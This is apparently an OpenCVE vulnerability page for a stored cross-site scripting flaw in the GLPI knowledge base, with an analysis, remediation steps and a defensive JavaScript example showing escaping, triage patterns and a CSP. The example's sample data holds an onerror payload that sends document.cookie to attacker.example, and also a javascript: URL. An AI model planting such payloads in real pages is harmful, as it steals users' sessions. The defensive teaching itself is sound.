Description
An unauthenticated user with write access to the knowledge base can store an XSS payload in a knowledge base item.


This issue affects glpi: before 11.0.7.
Published: 2026-06-02
Score: 8.4 High
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A user with write access to the knowledge base can embed an XSS payload in a knowledge base item. Because the payload is stored server-side, it executes in the browser of every user who later views the item, which can enable session cookie theft, account hijacking or phishing delivered from inside the GLPI interface. Note that the record's description calls the attacker "unauthenticated" while the published CVSS v4 vector records PR:H (high privileges required) and UI:A (active user interaction); together with the need for write access, the vector describes an authenticated, privileged author rather than an anonymous attacker. The weakness is CWE‑79, improper neutralization of input during web page generation (cross‑site scripting).

Affected Systems

The issue affects all GLPI releases prior to 11.0.7 (the CVE title names 11.0.0). Operators should check their installed GLPI version and review which accounts or profiles hold write rights to the knowledge base module, since those are the accounts that could store a payload.

Risk and Exploitability

The CVSS v4 base score of 8.4 classifies the flaw as high severity. The vector (AV:N/AC:L/AT:N/PR:H/UI:A/VC:H/VI:H/VA:H) describes a network‑reachable, low‑complexity flaw that nonetheless requires high privileges on the attacker's side and user interaction on the victim's side. No EPSS score is available and the vulnerability is not listed in CISA KEV. The attacker must be able to write knowledge base items; once a payload is stored, every user who views the item, administrators included, is exposed, so the practical risk is highest where knowledge base authoring is granted broadly.

Generated by OpenCVE AI on June 3, 2026 at 04:41 UTC.

Remediation

No vendor advisory is linked on this page. The affected range (before 11.0.7) indicates that GLPI 11.0.7 contains the fix.

OpenCVE Recommended Actions

  • Upgrade to GLPI 11.0.7 or later, the first release outside the affected range.
  • Until the upgrade is done, restrict write permission on the knowledge base to trusted profiles; a payload can only be stored by an account that can author items.
  • Treat the fix as an output‑side control: knowledge base content must be sanitized or encoded for the HTML context in which it is rendered. A Content Security Policy that disallows inline scripts limits the impact of any payload that is already stored. A web application firewall can block common payload patterns but is a secondary control, not a substitute for the patch.
  • After upgrading, review knowledge base items created before the fix for embedded script tags, inline event handlers or javascript: URLs, since an upgrade does not necessarily rewrite content that is already in the database.
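The Impact section above describes the stored‑XSS pattern and the recommended actions call for output‑side sanitization plus a CSP. The following is an added example, not GLPI code, that shows the vulnerable render path beside an escaped one, a heuristic triage check for already‑stored rows, and a CSP header that blocks inline handlers. The knowledge base rows, the attacker host and the function names are constructed for illustration.

```javascript
// Added example (not GLPI code): stored XSS in a knowledge-base item, the
// output-encoding control that defeats it, and a triage check for rows that
// were stored before the fix. All data below is constructed.

// Constructed knowledge-base rows; items 1 and 3 carry stored payloads.
const kbItems = [
  {
    id: 1,
    title: 'Reset VPN password',
    body: 'Open the portal and click <img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">reset',
  },
  { id: 2, title: 'Printer setup', body: '<p>Install the <b>driver</b> from the share.</p>' },
  { id: 3, title: 'Onboarding', body: '<a href="javascript:alert(document.domain)">start</a>' },
];

// Vulnerable render: stored content is interpolated into markup unchanged,
// so every viewer of item 1 runs the onerror handler in their own session.
function renderKbItemUnsafe(item) {
  return `<h1>${item.title}</h1><div class="kb-body">${item.body}</div>`;
}

// Encode the characters that matter in HTML text and double-quoted attribute
// contexts; the browser then shows the payload as literal text.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened render for a field that is treated as plain text.
function renderKbItemSafe(item) {
  return `<h1>${escapeHtml(item.title)}</h1><div class="kb-body">${escapeHtml(item.body)}</div>`;
}

// Triage heuristic for content stored before the fix: flags script tags,
// inline event handlers, javascript: URLs and iframe/srcdoc. Heuristic only;
// it will not catch every encoding trick, so treat hits as a review queue.
const PAYLOAD_PATTERNS = [/<script\b/i, /\bon[a-z]+\s*=/i, /javascript\s*:/i, /<iframe\b/i, /\bsrcdoc\s*=/i];

function findSuspiciousItems(items) {
  return items
    .filter((it) => PAYLOAD_PATTERNS.some((re) => re.test(it.title) || re.test(it.body)))
    .map((it) => it.id);
}

// Defence in depth: a CSP without 'unsafe-inline' stops inline handlers and
// javascript: URLs from executing even if a payload reaches the page.
const CSP_HEADER = "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'";

console.log(renderKbItemUnsafe(kbItems[0]));
console.log(renderKbItemSafe(kbItems[0]));
console.log('review queue:', findSuspiciousItems(kbItems));
console.log(CSP_HEADER);
```

The escaping shown is the right control where the field is rendered as plain text. A knowledge base that intentionally stores rich HTML needs an allowlist sanitizer instead, one that strips script‑capable elements, event‑handler attributes and javascript: URLs while keeping formatting tags; simple escaping would break the formatting that such a field exists to carry.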



Advisories

No advisories yet.

History

Wed, 03 Jun 2026 04:45:00 +0000

Type | Values Removed | Values Added
First Time appeared | | Glpi-project; Glpi-project glpi
Vendors & Products | | Glpi-project; Glpi-project glpi

Wed, 03 Jun 2026 02:30:00 +0000

Type | Values Removed | Values Added
Description | | An unauthenticated user with write access to the knowledge base can store an XSS payload in a knowledge base item. This issue affects glpi: before 11.0.7.
Title | | GLPI 11.0.0 - Stored XSS in knowledge base
Weaknesses | | CWE-79
References | |
Metrics | | cvssV4_0 {'score': 8.4, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N'}


MITRE

Status: PUBLISHED

Assigner: Fluid Attacks

Published:

Updated: 2026-06-02T18:32:01.150Z

Reserved: 2026-04-01T20:34:27.215Z

Link: CVE-2026-5385

Vulnrichment

No data.

NVD

Status : Received

Published: 2026-06-02T20:16:40.840

Modified: 2026-06-02T20:16:40.840

Link: CVE-2026-5385

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-03T04:30:05Z

Weaknesses